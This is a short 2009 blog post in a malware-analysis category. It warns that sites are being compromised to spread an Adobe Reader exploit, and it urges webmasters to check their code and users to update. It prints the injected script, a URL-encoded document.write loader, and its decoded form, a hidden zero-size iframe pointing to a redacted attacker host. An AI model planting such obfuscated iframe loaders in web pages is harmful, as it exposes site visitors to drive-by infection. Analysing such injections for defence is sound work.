Why you should get the latest version if you are using Acrobat Reader

April 6, 2009 on 10:08 am | In Malware analysis | 4 Comments

Since the 24th of February 2009 there is an exploit in the wild that affects all Adobe Reader versions 9.0 and earlier.
Twice since then I have been contacted by site owners that found their sites spreading malware. One of them got infected by his own site.
The method that is in use is add a piece of Javascript to the code of the site. This Javascript points to an i-frame which in turn holds the exploit.
The javascript that gets added to the site usually just is an encrypted pointer like this:

document.write( unescape( '%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%0D%0A%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%78%78%78%78%78%78%78%78%78%78%78%2F%75%6E%69%71%75%65%2F%69%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%22%30%22%20%68%65%69%67%68%74%3D%22%30%22%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%3B%22%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B%0D%0A%3C%2F%73%63%72%69%70%74%3E%0D%0A' ) );

Which looks like this after parsing:

document.write('<iframe src="http://xxxxxxxxxxx/unique/index.php" width="0" height="0" style="display:none;"></iframe>');

Obviously I x-ed out the domain. It doesn’t matter for this one if you are using IE, Opera, FireFox or any other browser. If you have Acrobat Reader installed and it’s not the latest version, you’re vulnerable.

So, webmasters, check if your code is unchanged and readers, make sure to get the latest updates of everything you are using.

Powered by WordPress with Pool theme design by Borja Fernandez.
Entries and comments feeds. Valid XHTML and CSS. ^Top^